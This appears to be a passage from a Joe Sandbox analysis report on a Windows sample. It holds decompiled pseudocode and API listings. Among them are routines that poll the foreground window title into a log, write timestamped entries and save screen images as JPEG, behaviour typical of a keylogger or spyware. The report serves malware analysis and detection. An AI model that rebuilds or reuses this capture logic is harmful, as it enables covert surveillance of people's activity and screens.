                                                                                                                                      • SHCreateMemStream.SHLWAPI(00000000,00000000,?,74CB6490,?,00000000), ref: 01306AA9
                                                                                                                                        • Part of subcall function 013062DA: GdipLoadImageFromStream.GDIPLUS(?,?,00000000,013069EF,00000000,?,?,?,00000000), ref: 013062EE
                                                                                                                                        • Part of subcall function 0130634D: GdipSaveImageToFile.GDIPLUS(?,?,?,?,00000000,01306A17,00000000,?,00000000,00000000,?,?,?,00000000), ref: 0130635F
                                                                                                                                        • Part of subcall function 013062FD: GdipDisposeImage.GDIPLUS(?,01306A25,?,?,?,00000000), ref: 01306306
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.505409012.0000000001301000.00000020.00000001.01000000.00000005.sdmp, Offset: 01300000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.505385438.0000000001300000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.505578317.0000000001324000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.505631265.000000000132E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.505681175.0000000001330000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_1300000_hjrypmyqervekvpteu.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: CreateGdipImage$H_prologStream$CompatibleDisposeFileFromLoadSave
                                                                                                                                      • String ID: K$image/jpeg$jpg
                                                                                                                                      • API String ID: 1779936357-435979330
                                                                                                                                      • Opcode ID: b1ec9cd5c29cad8c9ba29bd6b01cbb22ebe551d1ba5749cc97991d76451a6014
                                                                                                                                      • Instruction ID: 6ee465e2607947b4b87b152f39b58ee601ad511a8a82973cb1758a4ab472be39
                                                                                                                                      • Opcode Fuzzy Hash: b1ec9cd5c29cad8c9ba29bd6b01cbb22ebe551d1ba5749cc97991d76451a6014
                                                                                                                                      • Instruction Fuzzy Hash: E62165B5C00219DFCB06EBA8C995BDEB7F8AF29308F104059E516B7281EF745B09CB60
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      C-Code - Quality: 95%
                                                                                                                                      			E013016B5() {
                                                                                                                                      				void* _t23;
                                                                                                                                      				void* _t25;
                                                                                                                                      				void* _t26;
                                                                                                                                      				signed int _t36;
                                                                                                                                      				void* _t39;
                                                                                                                                      				void* _t40;
                                                                                                                                      				void* _t60;
                                                                                                                                      				void* _t63;
                                                                                                                                      				void* _t64;
                                                                                                                                      				char** _t65;
                                                                                                                                      				void* _t66;
                                                                                                                                      				void* _t67;
                                                                                                                                      				void* _t68;
                                                                                                                                      
                                                                                                                                      				E01323174(E013231F2, _t56, _t69);
                                                                                                                                      				_t62 = _t40;
                                                                                                                                      				_t60 = Sleep;
                                                                                                                                      				_t39 = _t40 + 0xb8;
                                                                                                                                      				while(1) {
                                                                                                                                      					E0130C510(_t60, _t63 - 0x828, 0, 0x7d0);
                                                                                                                                      					_t65 = _t64 + 0xc;
                                                                                                                                      					while(1) {
                                                                                                                                      						_t66 = _t65 - 0x18;
                                                                                                                                      						E01302814(_t66, _t56, _t69, _t39);
                                                                                                                                      						_t56 = 0;
                                                                                                                                      						_t23 = E01307932(_t63 - 0x828, 0, _t69);
                                                                                                                                      						_t65 = _t66 + 0x18;
                                                                                                                                      						_t69 = _t23;
                                                                                                                                      						if(_t23 != 0) {
                                                                                                                                      							break;
                                                                                                                                      						}
                                                                                                                                      						Sleep(0x1f4);
                                                                                                                                      					}
                                                                                                                                      					_t25 = E013027E1(_t63 - 0x58, 0, _t63 - 0x828);
                                                                                                                                      					 *(_t63 - 4) =  *(_t63 - 4) & 0x00000000;
                                                                                                                                      					_t26 = E0130326C(_t63 - 0x40, L"\r\n[ ", _t25);
                                                                                                                                      					 *(_t63 - 4) = 1;
                                                                                                                                      					_t58 = _t26;
                                                                                                                                      					 *_t65 = L" ]\r\n";
                                                                                                                                      					E0130275A(_t62 + 4, _t26, E013031AE(_t63 - 0x28, _t26, _t60));
                                                                                                                                      					E01302755(_t63 - 0x28, _t58, __eflags);
                                                                                                                                      					E01302755(_t63 - 0x40, _t58, __eflags);
                                                                                                                                      					_t14 = _t63 - 4;
                                                                                                                                      					 *_t14 =  *(_t63 - 4) | 0xffffffff;
                                                                                                                                      					__eflags =  *_t14;
                                                                                                                                      					E01302755(_t63 - 0x58, _t58, __eflags);
                                                                                                                                      					_t67 = _t65 - 0x18;
                                                                                                                                      					E01302814(_t67, _t58, __eflags, _t62 + 0x68);
                                                                                                                                      					E013013D7(_t62, _t58, __eflags);
                                                                                                                                      					while(1) {
                                                                                                                                      						_t68 = _t67 - 0x18;
                                                                                                                                      						E01302814(_t68, _t58, __eflags, _t39);
                                                                                                                                      						_t56 = 0;
                                                                                                                                      						_t36 = E01307932(0, 0, __eflags);
                                                                                                                                      						_t64 = _t68 + 0x18;
                                                                                                                                      						__eflags = _t36;
                                                                                                                                      						if(__eflags == 0) {
                                                                                                                                      							break;
                                                                                                                                      						}
                                                                                                                                      						Sleep(0x64);
                                                                                                                                      					}
                                                                                                                                      					E01301D38(_t62, 0, __eflags);
                                                                                                                                      				}
                                                                                                                                      			}
















                                                                                                                                      0x013016ba
                                                                                                                                      0x013016c7
                                                                                                                                      0x013016ca
                                                                                                                                      0x013016d0
                                                                                                                                      0x013016d6
                                                                                                                                      0x013016e4
                                                                                                                                      0x013016e9
                                                                                                                                      0x013016ec
                                                                                                                                      0x013016ec
                                                                                                                                      0x013016f2
                                                                                                                                      0x013016f7
                                                                                                                                      0x013016ff
                                                                                                                                      0x01301704
                                                                                                                                      0x01301707
                                                                                                                                      0x01301709
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x01301710
                                                                                                                                      0x01301710
                                                                                                                                      0x0130171e
                                                                                                                                      0x01301723
                                                                                                                                      0x01301730
                                                                                                                                      0x01301735
                                                                                                                                      0x0130173c
                                                                                                                                      0x0130173e
                                                                                                                                      0x0130174f
                                                                                                                                      0x01301757
                                                                                                                                      0x0130175f
                                                                                                                                      0x01301764
                                                                                                                                      0x01301764
                                                                                                                                      0x01301764
                                                                                                                                      0x0130176b
                                                                                                                                      0x01301770
                                                                                                                                      0x01301779
                                                                                                                                      0x01301780
                                                                                                                                      0x01301785
                                                                                                                                      0x01301785
                                                                                                                                      0x0130178b
                                                                                                                                      0x01301790
                                                                                                                                      0x01301794
                                                                                                                                      0x01301799
                                                                                                                                      0x0130179c
                                                                                                                                      0x0130179e
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x013017a2
                                                                                                                                      0x013017a2
                                                                                                                                      0x013017a8
                                                                                                                                      0x013017a8

                                                                                                                                      APIs
                                                                                                                                      • __EH_prolog.LIBCMT ref: 013016BA
                                                                                                                                        • Part of subcall function 01307932: __EH_prolog.LIBCMT ref: 01307937
                                                                                                                                        • Part of subcall function 01307932: GetForegroundWindow.USER32(74CB6490,?,00000000), ref: 0130794B
                                                                                                                                        • Part of subcall function 01307932: GetWindowTextLengthW.USER32(00000000), ref: 01307954
                                                                                                                                        • Part of subcall function 01307932: GetWindowTextW.USER32 ref: 01307984
                                                                                                                                        • Part of subcall function 01307932: CharLowerW.USER32(00000000), ref: 01307993
                                                                                                                                      • Sleep.KERNEL32(000001F4), ref: 01301710
                                                                                                                                      • Sleep.KERNEL32(00000064), ref: 013017A2
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.505409012.0000000001301000.00000020.00000001.01000000.00000005.sdmp, Offset: 01300000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.505385438.0000000001300000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.505578317.0000000001324000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.505631265.000000000132E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.505681175.0000000001330000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_1300000_hjrypmyqervekvpteu.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Window$H_prologSleepText$CharForegroundLengthLower
                                                                                                                                      • String ID: [ $ ]
                                                                                                                                      • API String ID: 696682042-93608704
                                                                                                                                      • Opcode ID: 25f1518e1916ad82818acb75528d6f4ffebd89a420d10219bc991938c49f07fc
                                                                                                                                      • Instruction ID: cd037f5c9fab734fe250db694923030bc7f17c18bc2706d362611e873a8eb0bd
                                                                                                                                      • Opcode Fuzzy Hash: 25f1518e1916ad82818acb75528d6f4ffebd89a420d10219bc991938c49f07fc
                                                                                                                                      • Instruction Fuzzy Hash: 02219D319002199BCB1AFB7CCC65BEE77EDAF64718F444158D442631C1EF70AA4A8BA2
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      C-Code - Quality: 65%
                                                                                                                                      			E01301DA8(void* __ecx, void* __edx, void* __eflags) {
                                                                                                                                      				void* __edi;
                                                                                                                                      				void* __esi;
                                                                                                                                      				void* _t28;
                                                                                                                                      				void* _t42;
                                                                                                                                      				void* _t43;
                                                                                                                                      				void* _t74;
                                                                                                                                      				void* _t76;
                                                                                                                                      
                                                                                                                                      				_t43 = __ecx;
                                                                                                                                      				E01323174(E0132328C, __edx, __eflags);
                                                                                                                                      				_t77 = _t76 - 0x44;
                                                                                                                                      				_t69 = _t43;
                                                                                                                                      				_t1 = _t74 - 4;
                                                                                                                                      				 *_t1 =  *(_t74 - 4) & 0x00000000;
                                                                                                                                      				_t80 =  *_t1;
                                                                                                                                      				GetLocalTime(_t74 - 0x20);
                                                                                                                                      				_t28 = E01303294(_t74 - 0x50, L"\r\n[%04i/%02i/%02i %02i:%02i:%02i ",  *_t1);
                                                                                                                                      				 *(_t74 - 4) = 1;
                                                                                                                                      				_t67 = _t28;
                                                                                                                                      				 *((intOrPtr*)(_t76 - 0x44)) = L"]\r\n";
                                                                                                                                      				E0130275A(_t74 + 8, _t28, E013031AE(_t74 - 0x38, _t28, _t43, _t74 + 8));
                                                                                                                                      				E01302755(_t74 - 0x38, _t67,  *_t1);
                                                                                                                                      				 *(_t74 - 4) = 0;
                                                                                                                                      				E01302755(_t74 - 0x50, _t67, _t80);
                                                                                                                                      				_push(0x64 + E01302709() * 2);
                                                                                                                                      				_t72 = E01311119(_t74 + 8);
                                                                                                                                      				_push( *(_t74 - 0x14) & 0x0000ffff);
                                                                                                                                      				_push( *(_t74 - 0x16) & 0x0000ffff);
                                                                                                                                      				_push( *(_t74 - 0x18) & 0x0000ffff);
                                                                                                                                      				_push( *(_t74 - 0x1a) & 0x0000ffff);
                                                                                                                                      				_push( *(_t74 - 0x1e) & 0x0000ffff);
                                                                                                                                      				_push( *(_t74 - 0x20) & 0x0000ffff);
                                                                                                                                      				wsprintfW(_t35, E01302712(_t74 + 8, _t80));
                                                                                                                                      				E013027E1(_t77, _t67, _t72);
                                                                                                                                      				E013017EF(_t69, _t67, _t69, _t72, _t80);
                                                                                                                                      				L01310E9B(_t72);
                                                                                                                                      				_t42 = E01302755(_t74 + 8, _t67, _t80);
                                                                                                                                      				 *[fs:0x0] =  *((intOrPtr*)(_t74 - 0xc));
                                                                                                                                      				return _t42;
                                                                                                                                      			}










                                                                                                                                      0x01301da8
                                                                                                                                      0x01301dad
                                                                                                                                      0x01301db2
                                                                                                                                      0x01301db7
                                                                                                                                      0x01301db9
                                                                                                                                      0x01301db9
                                                                                                                                      0x01301db9
                                                                                                                                      0x01301dc1
                                                                                                                                      0x01301dd3
                                                                                                                                      0x01301dd8
                                                                                                                                      0x01301ddf
                                                                                                                                      0x01301de1
                                                                                                                                      0x01301df2
                                                                                                                                      0x01301dfa
                                                                                                                                      0x01301e02
                                                                                                                                      0x01301e06
                                                                                                                                      0x01301e1a
                                                                                                                                      0x01301e25
                                                                                                                                      0x01301e2b
                                                                                                                                      0x01301e30
                                                                                                                                      0x01301e35
                                                                                                                                      0x01301e3a
                                                                                                                                      0x01301e3f
                                                                                                                                      0x01301e40
                                                                                                                                      0x01301e4b
                                                                                                                                      0x01301e56
                                                                                                                                      0x01301e5d
                                                                                                                                      0x01301e63
                                                                                                                                      0x01301e6c
                                                                                                                                      0x01301e75
                                                                                                                                      0x01301e7e

                                                                                                                                      APIs
                                                                                                                                      • __EH_prolog.LIBCMT ref: 01301DAD
                                                                                                                                      • GetLocalTime.KERNEL32(?,?,00000000), ref: 01301DC1
                                                                                                                                        • Part of subcall function 01303294: __EH_prolog.LIBCMT ref: 01303299
                                                                                                                                      • wsprintfW.USER32 ref: 01301E4B
                                                                                                                                        • Part of subcall function 013017EF: __EH_prolog.LIBCMT ref: 013017F4
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.505409012.0000000001301000.00000020.00000001.01000000.00000005.sdmp, Offset: 01300000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.505385438.0000000001300000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.505578317.0000000001324000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.505631265.000000000132E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.505681175.0000000001330000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_1300000_hjrypmyqervekvpteu.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: H_prolog$LocalTimewsprintf
                                                                                                                                      • String ID: [%04i/%02i/%02i %02i:%02i:%02i $]
                                                                                                                                      • API String ID: 178168823-1359877963
                                                                                                                                      • Opcode ID: e4ec9ebad846c62ebfccfd7a1bae068b71946d347f8401f96cfa185240cdfcc7
                                                                                                                                      • Instruction ID: bc98b0a3775e4716865aaee6f4f6333e2df830499ebebdb3c30c8642873726f5
                                                                                                                                      • Opcode Fuzzy Hash: e4ec9ebad846c62ebfccfd7a1bae068b71946d347f8401f96cfa185240cdfcc7
                                                                                                                                      • Instruction Fuzzy Hash: 53218072400129AACB19FBA8D864AFFB7F8EF28718F00401EF402921C0EF785A45C760
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      APIs
                                                                                                                                      • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,013127E8,00000000,?,01312788,00000000,0132BF10,0000000C,013128DF,00000000,00000002), ref: 01312857
                                                                                                                                      • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0131286A
                                                                                                                                      • FreeLibrary.KERNEL32(00000000,?,?,?,013127E8,00000000,?,01312788,00000000,0132BF10,0000000C,013128DF,00000000,00000002), ref: 0131288D
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.505409012.0000000001301000.00000020.00000001.01000000.00000005.sdmp, Offset: 01300000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.505385438.0000000001300000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.505578317.0000000001324000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.505631265.000000000132E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.505681175.0000000001330000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_1300000_hjrypmyqervekvpteu.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                      • String ID: CorExitProcess$mscoree.dll
                                                                                                                                      • API String ID: 4061214504-1276376045
                                                                                                                                      • Opcode ID: 3cd84a7f95ebdcffc8d43b16c167f357de0418f7b94a9b52908f8a8eda0737e2
                                                                                                                                      • Instruction ID: 270dfa85daef37cc7cc33cd301f6aa12a2755502e2cffdd5eaf4e135e60b68f6
                                                                                                                                      • Opcode Fuzzy Hash: 3cd84a7f95ebdcffc8d43b16c167f357de0418f7b94a9b52908f8a8eda0737e2
                                                                                                                                      • Instruction Fuzzy Hash: 45F06231A00218BBDB39AF95E809B9EBFBCEF44716F10416CFD09A2254DB349A40CB90
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      C-Code - Quality: 68%
                                                                                                                                      			E01307AF1(void* __ecx) {
                                                                                                                                      				char _v8;
                                                                                                                                      				_Unknown_base(*)()* _t4;
                                                                                                                                      
                                                                                                                                      				_t4 = GetProcAddress(GetModuleHandleA("kernel32"), "IsWow64Process");
                                                                                                                                      				 *0x132f8fc = _t4;
                                                                                                                                      				if(_t4 == 0) {
                                                                                                                                      					L3:
                                                                                                                                      					return 0;
                                                                                                                                      				} else {
                                                                                                                                      					 *0x132f8fc(GetCurrentProcess(),  &_v8);
                                                                                                                                      					if(_v8 != 1) {
                                                                                                                                      						goto L3;
                                                                                                                                      					} else {
                                                                                                                                      						return 1;
                                                                                                                                      					}
                                                                                                                                      				}
                                                                                                                                      			}





                                                                                                                                      0x01307b06
                                                                                                                                      0x01307b0c
                                                                                                                                      0x01307b13
                                                                                                                                      0x01307b30
                                                                                                                                      0x01307b33
                                                                                                                                      0x01307b15
                                                                                                                                      0x01307b20
                                                                                                                                      0x01307b2a
                                                                                                                                      0x00000000
                                                                                                                                      0x01307b2c
                                                                                                                                      0x01307b2f
                                                                                                                                      0x01307b2f
                                                                                                                                      0x01307b2a

                                                                                                                                      APIs
                                                                                                                                      • GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,0130770D,WinDir,00000000,00000000,?,?,?), ref: 01307AFF
                                                                                                                                      • GetProcAddress.KERNEL32(00000000), ref: 01307B06
                                                                                                                                      • GetCurrentProcess.KERNEL32(?,?,?,0130770D,WinDir,00000000,00000000,?,?,?), ref: 01307B19
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.505409012.0000000001301000.00000020.00000001.01000000.00000005.sdmp, Offset: 01300000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.505385438.0000000001300000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.505578317.0000000001324000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.505631265.000000000132E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.505681175.0000000001330000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_1300000_hjrypmyqervekvpteu.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: AddressCurrentHandleModuleProcProcess
                                                                                                                                      • String ID: IsWow64Process$kernel32
                                                                                                                                      • API String ID: 4190356694-3789238822
                                                                                                                                      • Opcode ID: cd54195562d1272405856b25a4f0c5b01005579fd11c6276ae1c8e12ec628551
                                                                                                                                      • Instruction ID: 63e8350b9fb41a7441ff93a28a373736e8c05bb1d1d3d93cde53f9b56c64b91d
                                                                                                                                      • Opcode Fuzzy Hash: cd54195562d1272405856b25a4f0c5b01005579fd11c6276ae1c8e12ec628551
                                                                                                                                      • Instruction Fuzzy Hash: 77E046B0910715ABCF30BFA1A91D84ABBEDEB46749B504198E202D3144DBB8D6809B64
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      C-Code - Quality: 70%
                                                                                                                                      			E01318928(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                                      				int _v8;
                                                                                                                                      				int _v12;
                                                                                                                                      				int _v16;
                                                                                                                                      				int _v20;
                                                                                                                                      				signed int _v56;
                                                                                                                                      				char _v268;
                                                                                                                                      				intOrPtr _v272;
                                                                                                                                      				char _v276;
                                                                                                                                      				char _v312;
                                                                                                                                      				char _v316;
                                                                                                                                      				void* __ebp;
                                                                                                                                      				void* _t36;
                                                                                                                                      				signed int _t38;
                                                                                                                                      				signed int _t42;
                                                                                                                                      				signed int _t50;
                                                                                                                                      				void* _t54;
                                                                                                                                      				void* _t56;
                                                                                                                                      				signed int* _t61;
                                                                                                                                      				intOrPtr _t71;
                                                                                                                                      				void* _t78;
                                                                                                                                      				signed int _t85;
                                                                                                                                      				signed int _t87;
                                                                                                                                      				signed int _t89;
                                                                                                                                      				int _t93;
                                                                                                                                      				char** _t96;
                                                                                                                                      				signed int _t100;
                                                                                                                                      				signed int _t101;
                                                                                                                                      				signed int _t106;
                                                                                                                                      				signed int _t107;
                                                                                                                                      				intOrPtr _t116;
                                                                                                                                      				intOrPtr _t118;
                                                                                                                                      
                                                                                                                                      				_t88 = __edi;
                                                                                                                                      				_t96 = E0131811E();
                                                                                                                                      				_v8 = 0;
                                                                                                                                      				_v12 = 0;
                                                                                                                                      				_v16 = 0;
                                                                                                                                      				_t36 = E0131817C( &_v8);
                                                                                                                                      				_pop(_t78);
                                                                                                                                      				if(_t36 != 0) {
                                                                                                                                      					L19:
                                                                                                                                      					_push(0);
                                                                                                                                      					_push(0);
                                                                                                                                      					_push(0);
                                                                                                                                      					_push(0);
                                                                                                                                      					_push(0);
                                                                                                                                      					E013110E6();
                                                                                                                                      					asm("int3");
                                                                                                                                      					_t106 = _t107;
                                                                                                                                      					_t38 =  *0x132e00c; // 0x17120af4
                                                                                                                                      					_v56 = _t38 ^ _t106;
                                                                                                                                      					 *0x132e2ac =  *0x132e2ac | 0xffffffff;
                                                                                                                                      					 *0x132e2a0 =  *0x132e2a0 | 0xffffffff;
                                                                                                                                      					_push(0);
                                                                                                                                      					_push(_t96);
                                                                                                                                      					_t77 = "TZ";
                                                                                                                                      					_t89 = 0;
                                                                                                                                      					 *0x132f488 = 0;
                                                                                                                                      					_t42 = E01311D7F("TZ", 0, __eflags,  &_v316,  &_v312, 0x100, "TZ");
                                                                                                                                      					__eflags = _t42;
                                                                                                                                      					if(_t42 != 0) {
                                                                                                                                      						__eflags = _t42 - 0x22;
                                                                                                                                      						if(_t42 == 0x22) {
                                                                                                                                      							_t101 = E013151CD(_t78, _v272);
                                                                                                                                      							__eflags = _t101;
                                                                                                                                      							if(__eflags != 0) {
                                                                                                                                      								_t50 = E01311D7F(_t77, 0, __eflags,  &_v276, _t101, _v272, _t77);
                                                                                                                                      								__eflags = _t50;
                                                                                                                                      								if(_t50 == 0) {
                                                                                                                                      									E01314615(0);
                                                                                                                                      									_t89 = _t101;
                                                                                                                                      								} else {
                                                                                                                                      									_push(_t101);
                                                                                                                                      									goto L25;
                                                                                                                                      								}
                                                                                                                                      							} else {
                                                                                                                                      								_push(0);
                                                                                                                                      								L25:
                                                                                                                                      								E01314615();
                                                                                                                                      							}
                                                                                                                                      						}
                                                                                                                                      					} else {
                                                                                                                                      						_t89 =  &_v268;
                                                                                                                                      					}
                                                                                                                                      					asm("sbb esi, esi");
                                                                                                                                      					_t100 =  ~(_t89 -  &_v268) & _t89;
                                                                                                                                      					__eflags = _t89;
                                                                                                                                      					if(__eflags == 0) {
                                                                                                                                      						L33:
                                                                                                                                      						E01318928(_t77, _t89, _t100, __eflags);
                                                                                                                                      					} else {
                                                                                                                                      						__eflags =  *_t89;
                                                                                                                                      						if(__eflags == 0) {
                                                                                                                                      							goto L33;
                                                                                                                                      						} else {
                                                                                                                                      							_push(_t89);
                                                                                                                                      							E01318753(_t77, _t89, _t100, __eflags);
                                                                                                                                      						}
                                                                                                                                      					}
                                                                                                                                      					E01314615(_t100);
                                                                                                                                      					__eflags = _v12 ^ _t106;
                                                                                                                                      					return E0130A07B(_v12 ^ _t106);
                                                                                                                                      				} else {
                                                                                                                                      					_t54 = E01318124( &_v12);
                                                                                                                                      					_pop(_t78);
                                                                                                                                      					if(_t54 != 0) {
                                                                                                                                      						goto L19;
                                                                                                                                      					} else {
                                                                                                                                      						_t56 = E01318150( &_v16);
                                                                                                                                      						_pop(_t78);
                                                                                                                                      						if(_t56 != 0) {
                                                                                                                                      							goto L19;
                                                                                                                                      						} else {
                                                                                                                                      							E01314615( *0x132f484);
                                                                                                                                      							 *0x132f484 = 0;
                                                                                                                                      							 *_t107 = 0x132f490;
                                                                                                                                      							if(GetTimeZoneInformation(??) != 0xffffffff) {
                                                                                                                                      								_t85 =  *0x132f490 * 0x3c;
                                                                                                                                      								_t87 =  *0x132f4e4; // 0x0
                                                                                                                                      								_push(__edi);
                                                                                                                                      								 *0x132f488 = 1;
                                                                                                                                      								_v8 = _t85;
                                                                                                                                      								_t116 =  *0x132f4d6; // 0x0
                                                                                                                                      								if(_t116 != 0) {
                                                                                                                                      									_v8 = _t85 + _t87 * 0x3c;
                                                                                                                                      								}
                                                                                                                                      								_t118 =  *0x132f52a; // 0x0
                                                                                                                                      								if(_t118 == 0) {
                                                                                                                                      									L9:
                                                                                                                                      									_v12 = 0;
                                                                                                                                      									_v16 = 0;
                                                                                                                                      								} else {
                                                                                                                                      									_t71 =  *0x132f538; // 0x0
                                                                                                                                      									if(_t71 == 0) {
                                                                                                                                      										goto L9;
                                                                                                                                      									} else {
                                                                                                                                      										_v12 = 1;
                                                                                                                                      										_v16 = (_t71 - _t87) * 0x3c;
                                                                                                                                      									}
                                                                                                                                      								}
                                                                                                                                      								_t93 = E0131A9D4(0, _t87);
                                                                                                                                      								if(WideCharToMultiByte(_t93, 0, 0x132f494, 0xffffffff,  *_t96, 0x3f, 0,  &_v20) == 0 || _v20 != 0) {
                                                                                                                                      									 *( *_t96) = 0;
                                                                                                                                      								} else {
                                                                                                                                      									( *_t96)[0x3f] = 0;
                                                                                                                                      								}
                                                                                                                                      								if(WideCharToMultiByte(_t93, 0, 0x132f4e8, 0xffffffff, _t96[1], 0x3f, 0,  &_v20) == 0 || _v20 != 0) {
                                                                                                                                      									 *(_t96[1]) = 0;
                                                                                                                                      								} else {
                                                                                                                                      									_t96[1][0x3f] = 0;
                                                                                                                                      								}
                                                                                                                                      							}
                                                                                                                                      							 *(E01318118()) = _v8;
                                                                                                                                      							 *(E0131810C()) = _v12;
                                                                                                                                      							_t61 = E01318112();
                                                                                                                                      							 *_t61 = _v16;
                                                                                                                                      							return _t61;
                                                                                                                                      						}
                                                                                                                                      					}
                                                                                                                                      				}
                                                                                                                                      			}


































                                                                                                                                      0x01318928
                                                                                                                                      0x01318937
                                                                                                                                      0x0131893e
                                                                                                                                      0x01318942
                                                                                                                                      0x01318945
                                                                                                                                      0x01318948
                                                                                                                                      0x0131894d
                                                                                                                                      0x01318950
                                                                                                                                      0x01318a78
                                                                                                                                      0x01318a78
                                                                                                                                      0x01318a79
                                                                                                                                      0x01318a7a
                                                                                                                                      0x01318a7b
                                                                                                                                      0x01318a7c
                                                                                                                                      0x01318a7d
                                                                                                                                      0x01318a82
                                                                                                                                      0x01318a86
                                                                                                                                      0x01318a8e
                                                                                                                                      0x01318a95
                                                                                                                                      0x01318a98
                                                                                                                                      0x01318aa5
                                                                                                                                      0x01318aac
                                                                                                                                      0x01318aad
                                                                                                                                      0x01318aaf
                                                                                                                                      0x01318ab4
                                                                                                                                      0x01318ac3
                                                                                                                                      0x01318aca
                                                                                                                                      0x01318ad2
                                                                                                                                      0x01318ad4
                                                                                                                                      0x01318ade
                                                                                                                                      0x01318ae1
                                                                                                                                      0x01318aee
                                                                                                                                      0x01318af1
                                                                                                                                      0x01318af3
                                                                                                                                      0x01318b0c
                                                                                                                                      0x01318b14
                                                                                                                                      0x01318b16
                                                                                                                                      0x01318b1c
                                                                                                                                      0x01318b21
                                                                                                                                      0x01318b18
                                                                                                                                      0x01318b18
                                                                                                                                      0x00000000
                                                                                                                                      0x01318b18
                                                                                                                                      0x01318af5
                                                                                                                                      0x01318af5
                                                                                                                                      0x01318af6
                                                                                                                                      0x01318af6
                                                                                                                                      0x01318af6
                                                                                                                                      0x01318b23
                                                                                                                                      0x01318ad6
                                                                                                                                      0x01318ad6
                                                                                                                                      0x01318ad6
                                                                                                                                      0x01318b30
                                                                                                                                      0x01318b32
                                                                                                                                      0x01318b34
                                                                                                                                      0x01318b36
                                                                                                                                      0x01318b46
                                                                                                                                      0x01318b46
                                                                                                                                      0x01318b38
                                                                                                                                      0x01318b38
                                                                                                                                      0x01318b3b
                                                                                                                                      0x00000000
                                                                                                                                      0x01318b3d
                                                                                                                                      0x01318b3d
                                                                                                                                      0x01318b3e
                                                                                                                                      0x01318b43
                                                                                                                                      0x01318b3b
                                                                                                                                      0x01318b4c
                                                                                                                                      0x01318b57
                                                                                                                                      0x01318b62
                                                                                                                                      0x01318956
                                                                                                                                      0x0131895a
                                                                                                                                      0x0131895f
                                                                                                                                      0x01318962
                                                                                                                                      0x00000000
                                                                                                                                      0x01318968
                                                                                                                                      0x0131896c
                                                                                                                                      0x01318971
                                                                                                                                      0x01318974
                                                                                                                                      0x00000000
                                                                                                                                      0x0131897a
                                                                                                                                      0x01318980
                                                                                                                                      0x01318985
                                                                                                                                      0x0131898b
                                                                                                                                      0x0131899b
                                                                                                                                      0x013189a1
                                                                                                                                      0x013189a8
                                                                                                                                      0x013189ae
                                                                                                                                      0x013189b2
                                                                                                                                      0x013189b8
                                                                                                                                      0x013189bb
                                                                                                                                      0x013189c2
                                                                                                                                      0x013189c9
                                                                                                                                      0x013189c9
